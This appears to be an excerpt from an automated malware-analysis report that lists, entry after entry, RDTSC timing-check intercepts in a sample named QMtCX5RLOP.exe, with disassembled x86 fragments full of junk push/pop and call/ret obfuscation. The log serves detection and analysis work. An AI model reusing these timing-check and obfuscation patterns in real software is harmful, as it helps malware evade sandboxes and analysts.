Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C2EDE second address: 15C2EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jnp 00007F9D00F1DB56h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop esi 0x0000000f jbe 00007F9D00F1DB62h 0x00000015 js 00007F9D00F1DB56h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C244D second address: 15C2465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D01181AB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C2465 second address: 15C2469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C2469 second address: 15C248F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F9D01181ABBh 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F9D01181AB3h 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C248F second address: 15C24B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D00F1DB64h 0x00000009 jnc 00007F9D00F1DB56h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C2A16 second address: 15C2A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007F9D01181AA6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C2A22 second address: 15C2A3D instructions: 0x00000000 rdtsc 0x00000002 js 00007F9D00F1DB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9D00F1DB5Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C2CDF second address: 15C2CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b js 00007F9D01181AA6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C2CF0 second address: 15C2CF8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C2CF8 second address: 15C2CFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C2CFE second address: 15C2D2B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F9D00F1DB56h 0x0000000d jmp 00007F9D00F1DB5Bh 0x00000012 pushad 0x00000013 popad 0x00000014 jnl 00007F9D00F1DB56h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jnl 00007F9D00F1DB56h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C2D2B second address: 15C2D45 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9D01181AA6h 0x00000008 jmp 00007F9D01181AB0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C4629 second address: 15C462D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C462D second address: 15C4652 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a jmp 00007F9D01181AAEh 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 pop ebx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C4652 second address: 15C4683 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F9D00F1DB5Dh 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 jne 00007F9D00F1DB5Eh 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C4B13 second address: 15C4B1D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9D01181AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C4B1D second address: 15C4B27 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9D00F1DB5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C5403 second address: 15C5414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jl 00007F9D01181AA6h 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C5509 second address: 15C550F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C550F second address: 15C5515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C5515 second address: 15C5519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C5519 second address: 15C551D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C55AA second address: 15C55AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C55AF second address: 15C55B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C56DF second address: 15C56E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F9D00F1DB56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C5DA7 second address: 15C5DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C6715 second address: 15C6747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9D00F1DB62h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C6747 second address: 15C67A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a xor esi, dword ptr [ebp+124464B6h] 0x00000010 mov dword ptr [ebp+122D1C53h], ecx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F9D01181AA8h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 push 00000000h 0x00000034 xor si, F19Ah 0x00000039 xchg eax, ebx 0x0000003a push ecx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C67A3 second address: 15C67A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C67A7 second address: 15C67AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C7861 second address: 15C7865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C9F8D second address: 15C9F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C9F93 second address: 15C9FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F9D00F1DB68h 0x0000000b jmp 00007F9D00F1DB62h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CAD38 second address: 15CAD3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C9FB7 second address: 15C9FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CAD3E second address: 15CAD42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CAD42 second address: 15CAD99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jc 00007F9D00F1DB5Ch 0x0000000f add edi, dword ptr [ebp+122D26AFh] 0x00000015 push 00000000h 0x00000017 sub dword ptr [ebp+122D2588h], edx 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F9D00F1DB58h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b pushad 0x0000003c push edi 0x0000003d pop edi 0x0000003e jo 00007F9D00F1DB56h 0x00000044 popad 0x00000045 push esi 0x00000046 jnp 00007F9D00F1DB56h 0x0000004c pop esi 0x0000004d popad 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 push ebx 0x00000053 pop ebx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CCC05 second address: 15CCC0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CCC0C second address: 15CCC19 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CCC19 second address: 15CCC26 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9D01181AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15CFD16 second address: 15CFD39 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9D00F1DB56h 0x00000008 jmp 00007F9D00F1DB64h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15D2344 second address: 15D2348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15D2348 second address: 15D2356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F9D00F1DB56h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1580815 second address: 1580821 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15D24BF second address: 15D2588 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F9D00F1DB58h 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F9D00F1DB58h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 jmp 00007F9D00F1DB64h 0x0000002d push dword ptr fs:[00000000h] 0x00000034 mov dword ptr [ebp+1247ED06h], ebx 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 jc 00007F9D00F1DB6Fh 0x00000047 call 00007F9D00F1DB62h 0x0000004c mov dword ptr [ebp+122D35B2h], edi 0x00000052 pop edi 0x00000053 mov eax, dword ptr [ebp+122D09E5h] 0x00000059 or edi, dword ptr [ebp+122D3695h] 0x0000005f push FFFFFFFFh 0x00000061 call 00007F9D00F1DB66h 0x00000066 mov bl, EDh 0x00000068 pop edi 0x00000069 nop 0x0000006a pushad 0x0000006b jo 00007F9D00F1DB58h 0x00000071 push eax 0x00000072 pop eax 0x00000073 pushad 0x00000074 jmp 00007F9D00F1DB65h 0x00000079 jbe 00007F9D00F1DB56h 0x0000007f popad 0x00000080 popad 0x00000081 push eax 0x00000082 push edi 0x00000083 push eax 0x00000084 push edx 0x00000085 push eax 0x00000086 push edx 0x00000087 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1580821 second address: 1580827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15D2588 second address: 15D258C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1580827 second address: 158082B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15D684A second address: 15D6882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D00F1DB68h 0x00000009 pop esi 0x0000000a jp 00007F9D00F1DB58h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push edi 0x00000013 jmp 00007F9D00F1DB60h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15D6882 second address: 15D68A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 jmp 00007F9D01181AB7h 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15D6ECD second address: 15D6ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15D7F92 second address: 15D7F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15D9CC2 second address: 15D9CE2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9D00F1DB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F9D00F1DB61h 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15D9CE2 second address: 15D9D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 xor dword ptr [ebp+122D2072h], eax 0x0000000d push 00000000h 0x0000000f sub dword ptr [ebp+122D1BA4h], ecx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F9D01181AA8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D1D7Eh], eax 0x00000037 xchg eax, esi 0x00000038 pushad 0x00000039 pushad 0x0000003a jmp 00007F9D01181AB5h 0x0000003f jnp 00007F9D01181AA6h 0x00000045 popad 0x00000046 pushad 0x00000047 jg 00007F9D01181AA6h 0x0000004d jmp 00007F9D01181AB2h 0x00000052 popad 0x00000053 popad 0x00000054 push eax 0x00000055 pushad 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15D9D60 second address: 15D9D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15DAC9C second address: 15DACB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15DACB7 second address: 15DACBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15DAE4F second address: 15DAE55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15DAE55 second address: 15DAE59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15DBEE1 second address: 15DBEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15DBEE5 second address: 15DBEF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15E1091 second address: 15E10AF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9D01181AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jmp 00007F9D01181AAEh 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15E10AF second address: 15E10B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F9D00F1DB56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15DDF2E second address: 15DDF40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15DDF40 second address: 15DDF45 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15E229A second address: 15E229E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15E235B second address: 15E2360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15E2360 second address: 15E2366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15DCE83 second address: 15DCE94 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F9D00F1DB56h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15E94FA second address: 15E94FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15EC3B9 second address: 15EC3BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F0DA4 second address: 15F0DC7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F9D01181AA6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F9D01181AB3h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F0DC7 second address: 15F0DD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9D00F1DB56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F39A3 second address: 15F39A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F9480 second address: 15F9484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F81F4 second address: 15F8227 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F9D01181AB6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F8227 second address: 15F8236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Ah 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F8236 second address: 15F825B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9D01181AB2h 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 jp 00007F9D01181AA6h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F825B second address: 15F8265 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9D00F1DB5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F883A second address: 15F8841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F8841 second address: 15F8857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007F9D00F1DB56h 0x00000009 jp 00007F9D00F1DB56h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F8857 second address: 15F885B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15F885B second address: 15F885F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
